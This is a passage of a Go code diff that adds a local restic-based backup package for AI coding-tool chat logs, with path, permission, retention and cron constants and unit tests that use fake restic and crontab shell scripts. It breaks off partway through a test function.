+func TestUpdateStatus_IncrementalCounts(t *testing.T) {
+ tmpDir := t.TempDir()
+ statusFile := filepath.Join(tmpDir, "status.json")
+ logger := newSilentLogger()
+
+ // Two successes then a failure
+ result := &BackupResult{SnapshotID: "snap1"}
+ updateStatus(logger, statusFile, result, nil)
+ result2 := &BackupResult{SnapshotID: "snap2"}
+ updateStatus(logger, statusFile, result2, nil)
+ updateStatus(logger, statusFile, nil, nil) // failure
+
+ data, err := os.ReadFile(statusFile)
+ require.NoError(t, err)
+
+ var status BackupStatus
+ require.NoError(t, json.Unmarshal(data, &status))
+
+ assert.Equal(t, 2, status.SuccessCount)
+ assert.Equal(t, 1, status.FailureCount)
+ assert.Equal(t, "snap2", status.LastSnapshotID)
+}
+
+func TestUpdateStatus_PreservesFirstBackup(t *testing.T) {
+ tmpDir := t.TempDir()
+ statusFile := filepath.Join(tmpDir, "status.json")
+ logger := newSilentLogger()
+
+ result := &BackupResult{SnapshotID: "first"}
+ updateStatus(logger, statusFile, result, nil)
+
+ data, err := os.ReadFile(statusFile)
+ require.NoError(t, err)
+ var status1 BackupStatus
+ require.NoError(t, json.Unmarshal(data, &status1))
+ firstBackup := status1.FirstBackup
+
+ // Second backup should NOT overwrite FirstBackup
+ result2 := &BackupResult{SnapshotID: "second"}
+ updateStatus(logger, statusFile, result2, nil)
+
+ data2, err := os.ReadFile(statusFile)
+ require.NoError(t, err)
+ var status2 BackupStatus
+ require.NoError(t, json.Unmarshal(data2, &status2))
+
+ assert.Equal(t, firstBackup, status2.FirstBackup,
+ "first backup timestamp should be preserved")
+}
diff --git a/pkg/chatbackup/constants.go b/pkg/chatbackup/constants.go
new file mode 100644
index 000000000..50a740499
--- /dev/null
+++ b/pkg/chatbackup/constants.go
@@ -0,0 +1,151 @@
+// pkg/chatbackup/constants.go
+// Chat backup infrastructure constants - SINGLE SOURCE OF TRUTH
+//
+// CRITICAL: All chat backup-related paths, permissions, and configuration values
+// MUST be defined here. Zero hardcoded values allowed (CLAUDE.md P0 rule #12).
+//
+// Code Monkey Cybersecurity - "Cybersecurity. With humans."
+
+package chatbackup
+
+import (
+ "os"
+ "time"
+)
+
+// ═══════════════════════════════════════════════════════════════════════════
+// File Paths - Chat Backup Infrastructure
+// ═══════════════════════════════════════════════════════════════════════════
+
+const (
+ // ResticRepoSubdir is the restic repository path relative to home directory
+ // RATIONALE: Separate from general backup repos to avoid confusion
+ ResticRepoSubdir = ".eos/restic/chat-archive"
+
+ // ResticPasswordSubdir is the password file relative to home directory
+ // RATIONALE: Reuse existing .eos/restic/ structure for consistency
+ ResticPasswordSubdir = ".eos/restic/chat-archive-password"
+
+ // ResticStatusSubdir is the status tracking file relative to home directory
+ // RATIONALE: Machine-readable health metrics for monitoring/alerting
+ ResticStatusSubdir = ".eos/restic/chat-archive-status.json"
+
+ // ResticLogSubdir is the log file relative to home directory
+ ResticLogSubdir = ".eos/restic/chat-archive.log"
+
+ // ResticLockSubdir is the lock file relative to home directory
+ // RATIONALE: flock prevents concurrent backup runs
+ ResticLockSubdir = ".eos/restic/chat-archive.lock"
+
+ // CronMarker is the identifier used to find/replace cron entries
+ CronMarker = "eos-chat-archive"
+)
+
+// ═══════════════════════════════════════════════════════════════════════════
+// File Permissions - Security Critical
+// ═══════════════════════════════════════════════════════════════════════════
+
+const (
+ // RepoDirPerm is the permission for the restic repository directory
+ // RATIONALE: Owner-only access to encrypted backup data
+ // SECURITY: Prevents unauthorized access to backup repository
+ // THREAT MODEL: Prevents backup data theft by other users
+ RepoDirPerm = os.FileMode(0700)
+
+ // ResticDirPerm is the permission for the .eos/restic/ directory
+ // RATIONALE: Owner-only access to backup infrastructure
+ // SECURITY: Contains password files and status data
+ // THREAT MODEL: Prevents credential exposure via directory listing
+ ResticDirPerm = os.FileMode(0700)
+
+ // PasswordFilePerm is the permission for the repository password file
+ // RATIONALE: Owner read-only to prevent password exposure via ps or /proc
+ // SECURITY: Prevents password modification after creation
+ // THREAT MODEL: Mitigates credential replacement attacks
+ PasswordFilePerm = os.FileMode(0400)
+
+ // StatusFilePerm is the permission for the status tracking file
+ // RATIONALE: Owner read/write for status updates
+ // SECURITY: Status contains no secrets, just timestamps and counts
+ // THREAT MODEL: Low risk - health metrics only
+ StatusFilePerm = os.FileMode(0644)
+
+ // LogFilePerm is the permission for the log file
+ // RATIONALE: Owner read/write, world read for debugging
+ // SECURITY: Logs may contain paths but no secrets
+ // THREAT MODEL: Information disclosure via paths is acceptable
+ LogFilePerm = os.FileMode(0644)
+)
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Restic Configuration
+// ═══════════════════════════════════════════════════════════════════════════
+
+const (
+ // PasswordLength is the number of characters for generated passwords
+ // RATIONALE: 32 chars URL-safe = ~190 bits entropy (exceeds AES-128)
+ PasswordLength = 32
+
+ // BackupTag is the restic tag applied to all chat archive snapshots
+ BackupTag = "chat-archive"
+
+ // AutoTag marks snapshots created by automated/scheduled runs
+ AutoTag = "auto"
+)
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Retention Policy Defaults
+// ═══════════════════════════════════════════════════════════════════════════
+
+const (
+ // DefaultKeepWithin keeps ALL snapshots within this duration
+ // RATIONALE: Fine-grained recovery for recent work (2 days)
+ DefaultKeepWithin = "48h"
+
+ // DefaultKeepHourly keeps N hourly snapshots after KeepWithin period
+ // RATIONALE: Matches hourly backup schedule for 1 day of hourly granularity
+ DefaultKeepHourly = 24
+
+ // DefaultKeepDaily keeps N daily snapshots
+ // RATIONALE: 7 days covers a work week of daily snapshots
+ DefaultKeepDaily = 7
+
+ // DefaultKeepWeekly keeps N weekly snapshots
+ // RATIONALE: 4 weeks covers a month of weekly snapshots
+ DefaultKeepWeekly = 4
+
+ // DefaultKeepMonthly keeps N monthly snapshots
+ // RATIONALE: 12 months covers a year of monthly snapshots
+ DefaultKeepMonthly = 12
+)
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Scheduling
+// ═══════════════════════════════════════════════════════════════════════════
+
+const (
+ // DefaultBackupCron is the default cron schedule (hourly at minute 0)
+ DefaultBackupCron = "0 * * * *"
+
+ // DefaultPruneCron is the default prune schedule (daily at 3:05am)
+ // RATIONALE: Offset 5 minutes from backup to avoid lock contention
+ DefaultPruneCron = "5 3 * * *"
+)
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Operational Timeouts
+// ═══════════════════════════════════════════════════════════════════════════
+
+const (
+ // BackupTimeout is the maximum time allowed for a single backup run
+ // RATIONALE: Chat data is typically <1GB; 10 minutes is generous
+ BackupTimeout = 10 * time.Minute
+
+ // PruneTimeout is the maximum time allowed for a prune operation
+ // RATIONALE: Pruning large repos can take time
+ PruneTimeout = 30 * time.Minute
+
+ // ResticCommandTimeout is the timeout for restic metadata commands
+ // RATIONALE: cat config, snapshots listing should be fast
+ ResticCommandTimeout = 30 * time.Second
+)
diff --git a/pkg/chatbackup/constants_test.go b/pkg/chatbackup/constants_test.go
new file mode 100644
index 000000000..ccb727731
--- /dev/null
+++ b/pkg/chatbackup/constants_test.go
@@ -0,0 +1,106 @@
+package chatbackup
+
+import (
+ "os"
+ "testing"
+ "time"
+
+ "github.com/stretchr/testify/assert"
+)
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Constants Tests - Verify values are sensible and permissions are secure
+// ═══════════════════════════════════════════════════════════════════════════
+
+func TestConstants_PathsNotEmpty(t *testing.T) {
+ assert.NotEmpty(t, ResticRepoSubdir, "ResticRepoSubdir must not be empty")
+ assert.NotEmpty(t, ResticPasswordSubdir, "ResticPasswordSubdir must not be empty")
+ assert.NotEmpty(t, ResticStatusSubdir, "ResticStatusSubdir must not be empty")
+ assert.NotEmpty(t, ResticLogSubdir, "ResticLogSubdir must not be empty")
+ assert.NotEmpty(t, ResticLockSubdir, "ResticLockSubdir must not be empty")
+ assert.NotEmpty(t, CronMarker, "CronMarker must not be empty")
+}
+
+func TestConstants_PathsSeparateFromSessionBackup(t *testing.T) {
+ // RATIONALE: The new chat-archive paths must not collide with the
+ // existing session_backup.go paths (.eos/restic/coding-sessions)
+ assert.NotEqual(t, ".eos/restic/coding-sessions", ResticRepoSubdir,
+ "must not collide with existing session backup repo")
+ assert.NotEqual(t, ".eos/restic/password", ResticPasswordSubdir,
+ "must not collide with existing session backup password")
+}
+
+func TestConstants_PermissionsNotWorldWritable(t *testing.T) {
+ // SECURITY: P0 Rule #12 - all permissions must be documented and secure
+ perms := []struct {
+ name string
+ perm os.FileMode
+ }{
+ {"RepoDirPerm", RepoDirPerm},
+ {"ResticDirPerm", ResticDirPerm},
+ {"PasswordFilePerm", PasswordFilePerm},
+ {"StatusFilePerm", StatusFilePerm},
+ {"LogFilePerm", LogFilePerm},
+ }
+
+ for _, p := range perms {
+ // No permission should be world-writable (0002)
+ assert.Equal(t, os.FileMode(0), p.perm&0002,
+ "%s (%04o) must not be world-writable", p.name, p.perm)
+ }
+}
+
+func TestConstants_PasswordPermIsReadOnly(t *testing.T) {
+ // SECURITY: Password file must be owner read-only (0400)
+ assert.Equal(t, os.FileMode(0400), PasswordFilePerm,
+ "PasswordFilePerm must be 0400 (owner read-only)")
+}
+
+func TestConstants_RepoDirIsOwnerOnly(t *testing.T) {
+ // SECURITY: Repository directory must be owner-only (0700)
+ assert.Equal(t, os.FileMode(0700), RepoDirPerm,
+ "RepoDirPerm must be 0700 (owner-only)")
+}
+
+func TestConstants_PasswordLength(t *testing.T) {
+ // SECURITY: Password must have sufficient entropy
+ // 32 URL-safe chars = ~190 bits, exceeds AES-128 (128 bits)
+ assert.GreaterOrEqual(t, PasswordLength, 32,
+ "PasswordLength must be at least 32 chars for adequate entropy")
+}
+
+func TestConstants_RetentionDefaults(t *testing.T) {
+ assert.NotEmpty(t, DefaultKeepWithin)
+ assert.Greater(t, DefaultKeepHourly, 0)
+ assert.Greater(t, DefaultKeepDaily, 0)
+ assert.Greater(t, DefaultKeepWeekly, 0)
+ assert.Greater(t, DefaultKeepMonthly, 0)
+}
+
+func TestConstants_CronDefaults(t *testing.T) {
+ assert.NotEmpty(t, DefaultBackupCron, "DefaultBackupCron must not be empty")
+ assert.NotEmpty(t, DefaultPruneCron, "DefaultPruneCron must not be empty")
+
+ // Backup and prune should not run at the same time
+ assert.NotEqual(t, DefaultBackupCron, DefaultPruneCron,
+ "backup and prune cron must differ to avoid lock contention")
+}
+
+func TestConstants_Timeouts(t *testing.T) {
+ // Timeouts must be positive
+ assert.Greater(t, BackupTimeout, time.Duration(0))
+ assert.Greater(t, PruneTimeout, time.Duration(0))
+ assert.Greater(t, ResticCommandTimeout, time.Duration(0))
+
+ // Backup timeout should be less than prune timeout
+ // (backups are smaller operations)
+ assert.Less(t, BackupTimeout, PruneTimeout,
+ "backup timeout should be less than prune timeout")
+}
+
+func TestConstants_Tags(t *testing.T) {
+ assert.NotEmpty(t, BackupTag)
+ assert.NotEmpty(t, AutoTag)
+ assert.NotEqual(t, BackupTag, AutoTag,
+ "backup and auto tags must be different")
+}
diff --git a/pkg/chatbackup/errors.go b/pkg/chatbackup/errors.go
new file mode 100644
index 000000000..8f531db1b
--- /dev/null
+++ b/pkg/chatbackup/errors.go
@@ -0,0 +1,14 @@
+package chatbackup
+
+import "errors"
+
+var (
+ // ErrResticNotInstalled indicates the `restic` binary is not available in PATH.
+ ErrResticNotInstalled = errors.New("restic not installed")
+
+ // ErrRepositoryNotInitialized indicates the target restic repository is missing config.
+ ErrRepositoryNotInitialized = errors.New("repository not initialized")
+
+ // ErrBackupAlreadyRunning indicates a lock conflict for concurrent backup attempts.
+ ErrBackupAlreadyRunning = errors.New("backup already running")
+)
diff --git a/pkg/chatbackup/operations_test.go b/pkg/chatbackup/operations_test.go
new file mode 100644
index 000000000..8e55b560e
--- /dev/null
+++ b/pkg/chatbackup/operations_test.go
@@ -0,0 +1,696 @@
+package chatbackup
+
+import (
+ "context"
+ "encoding/json"
+ "os"
+ "os/user"
+ "path/filepath"
+ "strings"
+ "testing"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
+ "github.com/stretchr/testify/assert"
+ "github.com/stretchr/testify/require"
+)
+
+func newRuntimeContext() *eos_io.RuntimeContext {
+ return eos_io.NewContext(context.Background(), "chatbackup-test")
+}
+
+func prependFakeBin(t *testing.T, binaries map[string]string) {
+ t.Helper()
+
+ tmp := t.TempDir()
+ for name, body := range binaries {
+ path := filepath.Join(tmp, name)
+ require.NoError(t, os.WriteFile(path, []byte(body), 0755))
+ }
+
+ oldPath := os.Getenv("PATH")
+ require.NoError(t, os.Setenv("PATH", tmp+string(os.PathListSeparator)+oldPath))
+ t.Cleanup(func() {
+ _ = os.Setenv("PATH", oldPath)
+ })
+}
+
+func fakeResticScript() string {
+ return `#!/usr/bin/env bash
+set -euo pipefail
+repo=""
+args=("$@")
+for ((i=0;i<${#args[@]};i++)); do
+ if [[ "${args[$i]}" == "-r" ]] && (( i+1 < ${#args[@]} )); then
+ repo="${args[$((i+1))]}"
+ fi
+done
+joined=" $* "
+if [[ "${FAKE_RESTIC_FAIL:-}" == "1" ]]; then
+ echo "forced fail" >&2
+ exit 1
+fi
+if [[ "$joined" == *" init"* ]]; then
+ mkdir -p "$repo"
+ touch "$repo/config"
+ echo "created"
+ exit 0
+fi
+if [[ "$joined" == *" cat config"* ]]; then
+ [[ -f "$repo/config" ]] && exit 0
+ echo "missing config" >&2
+ exit 1
+fi
+if [[ "$joined" == *" backup "* ]]; then
+ if [[ "${FAKE_RESTIC_NO_SUMMARY:-}" == "1" ]]; then
+ echo '{"message_type":"status","percent_done":50}'
+ exit 0
+ fi
+ echo '{"message_type":"summary","snapshot_id":"snap-test","files_new":1,"files_changed":0,"files_unmodified":2,"data_added":123,"total_duration":0.2}'
+ exit 0
+fi
+if [[ "$joined" == *" forget "* ]]; then
+ if [[ "${FAKE_RESTIC_FAIL_FORGET:-}" == "1" ]]; then
+ echo "forced forget fail" >&2
+ exit 1
+ fi
+ echo "pruned"
+ exit 0
+fi
+if [[ "$joined" == *" snapshots"* ]]; then
+ echo "ID Time"
+ exit 0
+fi
+echo "unsupported args: $*" >&2
+exit 1
+`
+}
+
+func fakeCrontabScript() string {
+ return `#!/usr/bin/env bash
+set -euo pipefail
+store="${FAKE_CRONTAB_FILE:?}"
+last="${@: -1}"
+if [[ "$last" == "-l" ]]; then
+ [[ -f "$store" ]] && cat "$store"
+ exit 0
+fi
+if [[ "$last" == "-" ]]; then
+ cat > "$store"
+ exit 0
+fi
+echo "unsupported crontab args: $*" >&2
+exit 1
+`
+}
+
+func TestDiscoverPaths_RespectsIncludesAndExcludes(t *testing.T) {
+ tmp := t.TempDir()
+ dir := filepath.Join(tmp, ".claude", "projects")
+ require.NoError(t, os.MkdirAll(dir, 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(dir, "keep.jsonl"), []byte("{}"), 0644))
+ require.NoError(t, os.WriteFile(filepath.Join(dir, "skip.jsonl"), []byte("{}"), 0644))
+ require.NoError(t, os.WriteFile(filepath.Join(dir, "other.md"), []byte("#"), 0644))
+
+ registry := []ToolSource{
+ {
+ Name: "claude",
+ Paths: []SourcePath{
+ {
+ Path: "~/.claude/projects",
+ Includes: []string{"*.jsonl"},
+ Excludes: []string{"skip.jsonl"},
+ },
+ },
+ },
+ }
+
+ paths, tools, skipped := discoverPaths(newSilentLogger(), registry, tmp)
+ assert.Equal(t, []string{filepath.Join(dir, "keep.jsonl")}, paths)
+ assert.Equal(t, []string{"claude"}, tools)
+ assert.Empty(t, skipped)
+}
+
+func TestRunBackup_DryRunDoesNotRequireRestic(t *testing.T) {
+ tmp := t.TempDir()
+ dataDir := filepath.Join(tmp, ".claude", "projects")
+ require.NoError(t, os.MkdirAll(dataDir, 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(dataDir, "session.jsonl"), []byte("{}\n"), 0644))
+
+ rc := newRuntimeContext()
+ result, err := RunBackup(rc, BackupConfig{
+ HomeDir: tmp,
+ ExtraScanDirs: []string{},
+ DryRun: true,
+ })
+ require.NoError(t, err)
+ require.NotNil(t, result)
+ assert.NotEmpty(t, result.PathsBackedUp)
+}
+
+func TestRunBackup_SuccessUpdatesStatus(t *testing.T) {
+ prependFakeBin(t, map[string]string{"restic": fakeResticScript()})
+
+ tmp := t.TempDir()
+ dataDir := filepath.Join(tmp, ".claude", "projects")
+ repoPath := filepath.Join(tmp, ResticRepoSubdir)
+ passwordFile := filepath.Join(tmp, ResticPasswordSubdir)
+ statusFile := filepath.Join(tmp, ResticStatusSubdir)
+
+ require.NoError(t, os.MkdirAll(dataDir, 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(dataDir, "session.jsonl"), []byte("{}\n"), 0644))
+ require.NoError(t, os.MkdirAll(repoPath, 0700))
+ require.NoError(t, os.WriteFile(filepath.Join(repoPath, "config"), []byte("ok"), 0600))
+ require.NoError(t, os.MkdirAll(filepath.Dir(passwordFile), 0700))
+ require.NoError(t, os.WriteFile(passwordFile, []byte("password"), 0400))
+
+ rc := newRuntimeContext()
+ result, err := RunBackup(rc, BackupConfig{
+ HomeDir: tmp,
+ ExtraScanDirs: []string{},
+ })
+ require.NoError(t, err)
+ require.NotNil(t, result)
+ assert.Equal(t, "snap-test", result.SnapshotID)
+ assert.Equal(t, int64(123), result.BytesAdded)
+
+ data, err := os.ReadFile(statusFile)
+ require.NoError(t, err)
+ var status BackupStatus
+ require.NoError(t, json.Unmarshal(data, &status))
+ assert.Equal(t, 1, status.SuccessCount)
+ assert.Equal(t, "snap-test", status.LastSnapshotID)
+}
+
+func TestRunBackup_LockConflictFails(t *testing.T) {
+ prependFakeBin(t, map[string]string{"restic": fakeResticScript()})
+
+ tmp := t.TempDir()
+ dataDir := filepath.Join(tmp, ".claude", "projects")
+ repoPath := filepath.Join(tmp, ResticRepoSubdir)
+ passwordFile := filepath.Join(tmp, ResticPasswordSubdir)
+ lockFile := filepath.Join(tmp, ResticLockSubdir)
+
+ require.NoError(t, os.MkdirAll(dataDir, 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(dataDir, "session.jsonl"), []byte("{}\n"), 0644))
+ require.NoError(t, os.MkdirAll(repoPath, 0700))
+ require.NoError(t, os.WriteFile(filepath.Join(repoPath, "config"), []byte("ok"), 0600))
+ require.NoError(t, os.MkdirAll(filepath.Dir(passwordFile), 0700))
+ require.NoError(t, os.WriteFile(passwordFile, []byte("password"), 0400))
+
+ lock, err := acquireBackupLock(lockFile)
+ require.NoError(t, err)
+ defer releaseBackupLock(lock)
+
+ rc := newRuntimeContext()
+ _, err = RunBackup(rc, BackupConfig{
+ HomeDir: tmp,
+ ExtraScanDirs: []string{},
+ })
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "acquire backup lock")
+ assert.ErrorIs(t, err, ErrBackupAlreadyRunning)
+}
+
+func TestRunResticBackup_NoSummaryFails(t *testing.T) {
+ prependFakeBin(t, map[string]string{"restic": fakeResticScript()})
+ t.Setenv("FAKE_RESTIC_NO_SUMMARY", "1")
+
+ tmp := t.TempDir()
+ repoPath := filepath.Join(tmp, ResticRepoSubdir)
+ passwordFile := filepath.Join(tmp, ResticPasswordSubdir)
+ require.NoError(t, os.MkdirAll(repoPath, 0700))
+ require.NoError(t, os.MkdirAll(filepath.Dir(passwordFile), 0700))
+ require.NoError(t, os.WriteFile(passwordFile, []byte("password"), 0400))
+
+ _, err := runResticBackup(context.Background(), newSilentLogger(), repoPath, passwordFile, []string{tmp})
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "no summary")
+}
+
+func TestSetup_CreatesRepoPasswordAndCron(t *testing.T) {
+ prependFakeBin(t, map[string]string{
+ "restic": fakeResticScript(),
+ "crontab": fakeCrontabScript(),
+ })
+
+ tmp := t.TempDir()
+ crontabStore := filepath.Join(tmp, "crontab.txt")
+ t.Setenv("FAKE_CRONTAB_FILE", crontabStore)
+
+ rc := newRuntimeContext()
+ result, err := Setup(rc, ScheduleConfig{
+ BackupConfig: BackupConfig{
+ HomeDir: tmp,
+ },
+ BackupCron: "0 * * * *",
+ PruneCron: "5 3 * * *",
+ })
+ require.NoError(t, err)
+ require.NotNil(t, result)
+ assert.True(t, result.CronConfigured)
+
+ _, statErr := os.Stat(filepath.Join(tmp, ResticRepoSubdir, "config"))
+ assert.NoError(t, statErr)
+ _, statErr = os.Stat(filepath.Join(tmp, ResticPasswordSubdir))
+ assert.NoError(t, statErr)
+
+ cron, err := os.ReadFile(crontabStore)
+ require.NoError(t, err)
+ assert.Contains(t, string(cron), CronMarker)
+ assert.NotContains(t, string(cron), "--user ''")
+}
+
+func TestRunPrune_Success(t *testing.T) {
+ prependFakeBin(t, map[string]string{"restic": fakeResticScript()})
+
+ tmp := t.TempDir()
+ repoPath := filepath.Join(tmp, ResticRepoSubdir)
+ passwordFile := filepath.Join(tmp, ResticPasswordSubdir)
+
+ require.NoError(t, os.MkdirAll(repoPath, 0700))
+ require.NoError(t, os.WriteFile(filepath.Join(repoPath, "config"), []byte("ok"), 0600))
+ require.NoError(t, os.MkdirAll(filepath.Dir(passwordFile), 0700))
+ require.NoError(t, os.WriteFile(passwordFile, []byte("password"), 0400))
+
+ rc := newRuntimeContext()
+ err := RunPrune(rc, BackupConfig{
+ HomeDir: tmp,
+ })
+ require.NoError(t, err)
+}
+
+func TestRunBackup_NoPaths(t *testing.T) {
+ tmp := t.TempDir()
+ rc := newRuntimeContext()
+
+ result, err := RunBackup(rc, BackupConfig{
+ HomeDir: tmp,
+ ExtraScanDirs: []string{},
+ })
+ require.NoError(t, err)
+ require.NotNil(t, result)
+ assert.Empty(t, result.PathsBackedUp)
+}
+
+func TestRunBackup_RepoNotInitialized(t *testing.T) {
+ prependFakeBin(t, map[string]string{"restic": fakeResticScript()})
+
+ tmp := t.TempDir()
+ dataDir := filepath.Join(tmp, ".claude", "projects")
+ passwordFile := filepath.Join(tmp, ResticPasswordSubdir)
+ require.NoError(t, os.MkdirAll(dataDir, 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(dataDir, "session.jsonl"), []byte("{}\n"), 0644))
+ require.NoError(t, os.MkdirAll(filepath.Dir(passwordFile), 0700))
+ require.NoError(t, os.WriteFile(passwordFile, []byte("password"), 0400))
+
+ rc := newRuntimeContext()
+ _, err := RunBackup(rc, BackupConfig{
+ HomeDir: tmp,
+ ExtraScanDirs: []string{},
+ })
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "repository initialization")
+ assert.ErrorIs(t, err, ErrRepositoryNotInitialized)
+}
+
+func TestRunBackup_ResticFailureUpdatesFailureStatus(t *testing.T) {
+ prependFakeBin(t, map[string]string{"restic": fakeResticScript()})
+ t.Setenv("FAKE_RESTIC_FAIL", "1")
+
+ tmp := t.TempDir()
+ dataDir := filepath.Join(tmp, ".claude", "projects")
+ repoPath := filepath.Join(tmp, ResticRepoSubdir)
+ passwordFile := filepath.Join(tmp, ResticPasswordSubdir)
+ statusFile := filepath.Join(tmp, ResticStatusSubdir)
+ require.NoError(t, os.MkdirAll(dataDir, 0755))
+ require.NoError(t, os.WriteFile(filepath.Join(dataDir, "session.jsonl"), []byte("{}\n"), 0644))
+ require.NoError(t, os.MkdirAll(repoPath, 0700))
+ require.NoError(t, os.WriteFile(filepath.Join(repoPath, "config"), []byte("ok"), 0600))
+ require.NoError(t, os.MkdirAll(filepath.Dir(passwordFile), 0700))
+ require.NoError(t, os.WriteFile(passwordFile, []byte("password"), 0400))
+
+ rc := newRuntimeContext()
+ _, err := RunBackup(rc, BackupConfig{
+ HomeDir: tmp,
+ ExtraScanDirs: []string{},
+ })
+ require.Error(t, err)
+
+ data, readErr := os.ReadFile(statusFile)
+ require.NoError(t, readErr)
+ var status BackupStatus
+ require.NoError(t, json.Unmarshal(data, &status))
+ assert.Equal(t, 1, status.FailureCount)
+}
+
+func TestSetup_DryRun(t *testing.T) {
+ tmp := t.TempDir()
+ rc := newRuntimeContext()
+
+ result, err := Setup(rc, ScheduleConfig{
+ BackupConfig: BackupConfig{
+ HomeDir: tmp,
+ DryRun: true,
+ },
+ BackupCron: "0 * * * *",
+ PruneCron: "5 3 * * *",
+ })
+ require.NoError(t, err)
+ assert.False(t, result.CronConfigured)
+}
+
+func TestSetup_MissingResticFails(t *testing.T) {
+ tmp := t.TempDir()
+ emptyPath := t.TempDir()
+ t.Setenv("PATH", emptyPath)
+
+ rc := newRuntimeContext()
+ _, err := Setup(rc, ScheduleConfig{
+ BackupConfig: BackupConfig{
+ HomeDir: tmp,
+ },
+ BackupCron: "0 * * * *",
+ PruneCron: "5 3 * * *",
+ })
+ require.Error(t, err)
+ assert.ErrorIs(t, err, ErrResticNotInstalled)
+}
+
+func TestSetup_CronFailureBecomesWarning(t *testing.T) {
+ prependFakeBin(t, map[string]string{
+ "restic": fakeResticScript(),
+ "crontab": `#!/usr/bin/env bash
+set -euo pipefail
+echo "forced crontab failure" >&2
+exit 1
+`,
+ })
+
+ tmp := t.TempDir()
+ rc := newRuntimeContext()
+ result, err := Setup(rc, ScheduleConfig{
+ BackupConfig: BackupConfig{
+ HomeDir: tmp,
+ },
+ BackupCron: "0 * * * *",
+ PruneCron: "5 3 * * *",
+ })
+ require.NoError(t, err)
+ assert.False(t, result.CronConfigured)
+ assert.NotEmpty(t, result.Warnings)
+}
+
+func TestRunPrune_DryRun(t *testing.T) {
+ tmp := t.TempDir()
+ rc := newRuntimeContext()
+
+ err := RunPrune(rc, BackupConfig{
+ HomeDir: tmp,
+ DryRun: true,
+ })
+ require.NoError(t, err)
+}
+
+func TestEnsureRestic_Missing(t *testing.T) {
+ emptyPath := t.TempDir()
+ t.Setenv("PATH", emptyPath)
+ err := ensureRestic(newRuntimeContext())
+ require.Error(t, err)
+ assert.ErrorIs(t, err, ErrResticNotInstalled)
+}
+
+func TestEnsureRestic_Installed(t *testing.T) {
+ prependFakeBin(t, map[string]string{"restic": fakeResticScript()})
+ require.NoError(t, ensureRestic(newRuntimeContext()))
+}
+
+func TestOpErrorUnwrap(t *testing.T) {
+ base := assert.AnError
+ err := &opError{Op: "op", Err: base}
+ assert.Equal(t, "op: assert.AnError general error for testing", err.Error())
+ assert.ErrorIs(t, err, base)
+ assert.Equal(t, base, err.Unwrap())
+}
+
+func TestShellQuote(t *testing.T) {
+ assert.Equal(t, "''", shellQuote(""))
+ assert.Equal(t, "'abc'", shellQuote("abc"))
+ assert.True(t, strings.Contains(shellQuote("a'b"), "'\\''"))
+}
+
+func TestChownToUser_InvalidUser(t *testing.T) {
+ err := chownToUser(t.TempDir(), "__definitely_missing_user__")
+ require.Error(t, err)
+}
+
+func TestGeneratePassword_ParentMkdirFailure(t *testing.T) {
+ tmp := t.TempDir()
+ parentFile := filepath.Join(tmp, "not-a-dir")
+ require.NoError(t, os.WriteFile(parentFile, []byte("x"), 0600))
+
+ err := generatePassword(filepath.Join(parentFile, "password"))
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "failed to create directory")
+}
+
+func TestUpdateStatus_DirectoryCreationFailure(t *testing.T) {
+ tmp := t.TempDir()
+ parentFile := filepath.Join(tmp, "not-a-dir")
+ require.NoError(t, os.WriteFile(parentFile, []byte("x"), 0600))
+
+ updateStatus(newSilentLogger(), filepath.Join(parentFile, "status.json"), &BackupResult{
+ SnapshotID: "abc",
+ }, []string{"claude-code"})
+}
+
+func TestSetup_SecondRunReusesPassword(t *testing.T) {
+ prependFakeBin(t, map[string]string{
+ "restic": fakeResticScript(),
+ "crontab": fakeCrontabScript(),
+ })
+ tmp := t.TempDir()
+ t.Setenv("FAKE_CRONTAB_FILE", filepath.Join(tmp, "cron.txt"))
+
+ rc := newRuntimeContext()
+ first, err := Setup(rc, ScheduleConfig{
+ BackupConfig: BackupConfig{HomeDir: tmp},
+ BackupCron: DefaultBackupCron,
+ PruneCron: DefaultPruneCron,
+ })
+ require.NoError(t, err)
+ assert.True(t, first.PasswordGenerated)
+
+ second, err := Setup(rc, ScheduleConfig{
+ BackupConfig: BackupConfig{HomeDir: tmp},
+ BackupCron: DefaultBackupCron,
+ PruneCron: DefaultPruneCron,
+ })
+ require.NoError(t, err)
+ assert.False(t, second.PasswordGenerated)
+}
+
+func TestInitRepo_AlreadyInitialized(t *testing.T) {
+ prependFakeBin(t, map[string]string{"restic": fakeResticScript()})
+ tmp := t.TempDir()
+ repoPath := filepath.Join(tmp, ResticRepoSubdir)
+ passwordFile := filepath.Join(tmp, ResticPasswordSubdir)
+ require.NoError(t, os.MkdirAll(repoPath, 0700))
+ require.NoError(t, os.WriteFile(filepath.Join(repoPath, "config"), []byte("ok"), 0600))
+ require.NoError(t, os.MkdirAll(filepath.Dir(passwordFile), 0700))
+ require.NoError(t, os.WriteFile(passwordFile, []byte("password"), 0400))
+
+ require.NoError(t, initRepo(newRuntimeContext(), repoPath, passwordFile))
+}
+
+func TestConfigureCron_RemovesExistingMarker(t *testing.T) {
+ prependFakeBin(t, map[string]string{"crontab": fakeCrontabScript()})
+ tmp := t.TempDir()
+ cronFile := filepath.Join(tmp, "cron.txt")
+ existing := "# eos-chat-archive: old\n0 * * * * /old\n# keep-me\n"
+ require.NoError(t, os.WriteFile(cronFile, []byte(existing), 0600))
+ t.Setenv("FAKE_CRONTAB_FILE", cronFile)
+
+ err := configureCron(newRuntimeContext(), ScheduleConfig{
+ BackupConfig: BackupConfig{User: "test user"},
+ BackupCron: "0 * * * *",
+ PruneCron: "5 3 * * *",
+ }, tmp)
+ require.NoError(t, err)
+
+ data, readErr := os.ReadFile(cronFile)
+ require.NoError(t, readErr)
+ content := string(data)
+ assert.Contains(t, content, "# keep-me")
+ assert.GreaterOrEqual(t, strings.Count(content, CronMarker), 2)
+ assert.Contains(t, content, "--user 'test user'")
+}
+
+func TestRunPrune_NotInitializedFails(t *testing.T) {
